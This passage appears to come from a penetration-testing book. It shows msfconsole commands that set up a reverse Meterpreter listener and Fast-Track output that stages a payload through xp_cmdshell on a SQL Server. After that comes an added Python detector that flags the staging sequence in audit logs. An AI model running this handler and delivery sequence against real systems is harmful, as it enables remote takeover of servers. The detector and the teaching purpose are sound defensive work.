Chapter 17

Before launching the attack, we need to set up some options through msfconsole. For practice, let's create our own Metasploit listener manually. Fast-Track can set it up for you, but we will load the auto_add_route plugin within Metasploit so that we can automatically connect to systems on the internal network. We'll create a listener and then launch Fast-Track to attack the system.

root@bt:/opt/framework3/msf3# msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.32.129
LHOST => 172.16.32.129
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >

With our listener waiting for a connection from our soon-to-be compromised target, we launch Fast-Track. (When the xterm window opens, close it, since we already have a listener set up.)

[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=172.16.32.129,LPORT=443
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]

. . . SNIP . . .

[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
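The Fast-Track output above describes a recognizable sequence on the database server: xp_cmdshell is enabled, the payload is echoed into a file as hex chunks, and the hex is converted back to a binary under the 64 KB debug limit. The following detector, added here as an example and not code from the book or from Fast-Track, flags that sequence in SQL Server statement-audit lines. The audit line layout, the constructed sample lines, and the assumption that the hex-to-binary step shows up as a debug.exe invocation through xp_cmdshell are all assumptions made for the example.

```python
import re

# Constructed sample of SQL Server statement-audit lines (assumed "time user= stmt="
# layout; not real tool output). The hex content is filler, not a payload.
SAMPLE_AUDIT = r"""
2011-05-03T10:12:01 user=sa stmt=EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
2011-05-03T10:12:01 user=sa stmt=EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
2011-05-03T10:12:02 user=sa stmt=EXEC master..xp_cmdshell 'echo 4d5a90000300000004000000ffff0000b800000000000000 >> %TEMP%\h.txt'
2011-05-03T10:12:03 user=sa stmt=EXEC master..xp_cmdshell 'echo 40000000000000000000000000000000000000000000000000 >> %TEMP%\h.txt'
2011-05-03T10:12:04 user=sa stmt=EXEC master..xp_cmdshell 'echo 00000000000000000000000000000000000000000000000000 >> %TEMP%\h.txt'
2011-05-03T10:12:09 user=sa stmt=EXEC master..xp_cmdshell 'debug < %TEMP%\h.txt'
2011-05-03T10:12:10 user=app stmt=SELECT name FROM products WHERE id = 42
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+stmt=(?P<stmt>.*)$")
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
CMDSHELL_RE = re.compile(r"xp_cmdshell\s+'(?P<cmd>[^']*)'", re.I)
# "echo" of a long run of hex bytes appended to a file: the chunked staging step.
HEXCHUNK_RE = re.compile(r"^echo\s+(?:[0-9a-f]{2}\s*){10,}>>?\s*\S+", re.I)
# Assumed converter: debug.exe reading the staged file (the "64KB debug" step).
DEBUG_RE = re.compile(r"(^|[\s/\\])debug(\.exe)?(\s|$)", re.I)


def analyze(audit_text, chunk_threshold=3):
    """Scan audit lines and report the xp_cmdshell payload-staging sequence."""
    findings = {"xp_cmdshell_enabled": False, "hex_chunk_writes": 0,
                "debug_invoked": False, "alerts": []}
    for raw in audit_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        stmt = m.group("stmt")
        if ENABLE_RE.search(stmt):
            findings["xp_cmdshell_enabled"] = True
            findings["alerts"].append(f"{m['ts']} {m['user']}: xp_cmdshell enabled")
        c = CMDSHELL_RE.search(stmt)
        if not c:
            continue
        cmd = c.group("cmd").strip()
        if HEXCHUNK_RE.match(cmd):
            findings["hex_chunk_writes"] += 1
        if DEBUG_RE.search(cmd):
            findings["debug_invoked"] = True
            findings["alerts"].append(f"{m['ts']} {m['user']}: debug.exe run via xp_cmdshell")
    if findings["hex_chunk_writes"] >= chunk_threshold:
        findings["alerts"].append(f"{findings['hex_chunk_writes']} hex chunk writes via xp_cmdshell")
    return findings


if __name__ == "__main__":
    for alert in analyze(SAMPLE_AUDIT)["alerts"]:
        print(alert)
```

Any single xp_cmdshell enablement is worth an alert on its own; the chunk count and the converter invocation are what distinguish staged binary delivery from an administrator's one-off shell command.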